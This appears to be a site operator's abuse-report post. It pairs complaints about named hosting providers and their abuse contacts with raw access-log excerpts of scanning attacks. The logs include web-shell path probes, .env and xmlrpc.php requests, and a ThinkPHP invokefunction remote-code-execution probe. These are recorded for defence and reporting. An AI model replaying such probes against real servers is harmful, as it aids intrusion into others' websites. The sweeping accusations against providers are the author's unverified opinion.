52.187.45.15 website*x.com – – [07/Sep/2025:22:46:06 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.45.15 website*x.com – – [07/Sep/2025:22:46:06 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.45.15 website*x.com – – [07/Sep/2025:22:46:06 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.45.15 website*x.com – – [07/Sep/2025:22:46:07 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“

AS214209 – Internet Magnate (Pty) Ltd – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
reports@magnates.co.za – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
94.156.152.52 website*x.com – – [07/Sep/2025:03:38:37 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
94.156.152.52 website*x.com – – [07/Sep/2025:03:39:26 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS12488 – Krystal Hosting Ltd – IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@krystal.uk
62.100.204.111 website*x.com – – [07/Sep/2025:12:26:22 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“

MAIL NR. 15 SUNDAY!

abuse@datacamp.co.uk,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,google-cloud-compliance@google.com, network-abuse@google.com,

AS212238 – Datacamp Limited – HERe WITH 2 IP´S! – AGAIN AND AGAIN EVERY DAY!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@datacamp.co.uk – ONLY 1 AUTOMATIC ANSWER – NO MORE INFO – VERY POOR!
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:47 +0200] „GET /manager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:48 +0200] „GET /bless.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:48 +0200] „GET /O-Simple.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:49 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:50 +0200] „GET /zwso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:51 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:51 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:52 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:53 +0200] „GET /.well-known/login.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:54 +0200] „GET /mah.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:54 +0200] „GET /fai.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:55 +0200] „GET /.wp/wso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:56 +0200] „GET /core.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:57 +0200] „GET /robots.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:57 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
62.93.167.89 website*x.com – – [07/Sep/2025:03:32:58 +0200] „GET /mini.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
… and so on… and so on… VERY UNSECURE PROVIDER!!!
+
178.249.214.8 www.website*x.com – – [07/Sep/2025:04:51:31 +0200] „GET /?s=../%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.205.47 Safari/537.36“
178.249.214.8 www.website*x.com – – [07/Sep/2025:04:51:32 +0200] „GET /?s=../%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.2807.70 Safari/537.36“
178.249.214.8 www.website*x.com – – [07/Sep/2025:04:51:32 +0200] „GET /?s=../%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.1300.102 Safari/537.36“
178.249.214.8 www.website*x.com – – [07/Sep/2025:04:51:32 +0200] „GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.850.57 Safari/537.36“
178.249.214.8 www.website*x.com – – [07/Sep/2025:04:51:32 +0200] „GET /?s=../%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3004.30 Safari/537.36“
178.249.214.8 www.website*x.com – – [07/Sep/2025:04:51:33 +0200] „GET /?s=/index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1570.32 Safari/537.36“
178.249.214.8 www.website*x.com – – [07/Sep/2025:04:51:33 +0200] „GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.1157.5 Safari/537.36“
178.249.214.8 www.website*x.com – – [07/Sep/2025:04:51:33 +0200] „GET /?s=/Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.1201.35 Safari/537.36“

AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:03 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:04 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:04 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:04 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:04 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:04 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:04 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:04 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:05 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:05 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:05 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:05 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:05 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:05 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:06 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:06 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:06 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
35.237.189.91 website*x.com – – [07/Sep/2025:12:56:06 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“

MAIL NR. 16 SUNDAY!

abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,

AS51167 – Contabo GmbH – 162.244.28.0/22 IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
162.244.31.243 website*x.com – – [07/Sep/2025:11:32:04 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

MAIL NR. 17 SUNDAY!

abuse@cheapy.host,abuses@cyberzonehub.com

AS401120 – cheapy.host LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cheapy.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.72.57 website*x.com – – [07/Sep/2025:07:35:15 +0200] „POST /wp-confiq.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“
196.251.72.57 website*x.com – – [07/Sep/2025:07:35:41 +0200] „POST /wp-confiq.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“
196.251.72.57 www.website*x.com – – [07/Sep/2025:07:36:06 +0200] „POST /wp-confiq.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“
196.251.72.57 www.website*x.com – – [07/Sep/2025:07:36:31 +0200] „POST /wp-confiq.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“

AS209854 – Cyberzone S.A. – HERE WITH 2 IP´S! – AGAIN AND AGAIN!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuses@cyberzonehub.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:03 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:03 +0200] „GET /images/class-config.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:03 +0200] „GET /wp-content/1.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:03 +0200] „GET /mar.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:04 +0200] „GET /wp-content/themes/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:04 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:04 +0200] „GET /text.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:04 +0200] „GET /buy.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:04 +0200] „GET /function/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:05 +0200] „GET /as.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:05 +0200] „GET /wp-admin/css/about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:05 +0200] „GET /tinyfilemanager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:05 +0200] „GET /contact.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:05 +0200] „GET /wp-content/themes/pridmag/db.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:06 +0200] „GET /ws.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
185.196.0.11 website*x.com – – [07/Sep/2025:12:08:06 +0200] „GET /file/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
… and so on… and son on!!!
+
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:22 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:23 +0200] „GET /wp-cron.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:23 +0200] „GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:23 +0200] „GET /wp-includes/blocks/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:23 +0200] „GET /new.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:23 +0200] „GET /user.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:23 +0200] „GET /wp-includes/wp-class.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:24 +0200] „GET /ty.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:24 +0200] „GET /upload.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:24 +0200] „GET /class.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:24 +0200] „GET /tiny.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:24 +0200] „GET /nciii.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:25 +0200] „GET /wp-admin/admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:25 +0200] „GET /admin/log.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:25 +0200] „GET /wp-mail.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:25 +0200] „GET /we.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:26 +0200] „GET /wp-includes/Requests/library/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:26 +0200] „GET /wp-links.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:26 +0200] „GET /fm.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:26 +0200] „GET /elp.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:26 +0200] „GET /wp-includes/assets/autoload_classmap.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
185.196.0.9 website*x.com – – [07/Sep/2025:12:08:26 +0200] „GET /dropdown.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
… and so on… and son on!!!

MAIL NR. 18 SUNDAY!

abuse@hostglobal.plus,google-cloud-compliance@google.com, network-abuse@google.com,

AS202306 – HOSTGLOBAL.PLUS LTD – AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostglobal.plus – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
78.153.140.218 website*x.com – – [07/Sep/2025:13:41:16 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17“
78.153.140.218 website*x.com – – [07/Sep/2025:13:41:16 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) WebClip/13604.4.7.1.6 Safari/13604.4.7.1.6“
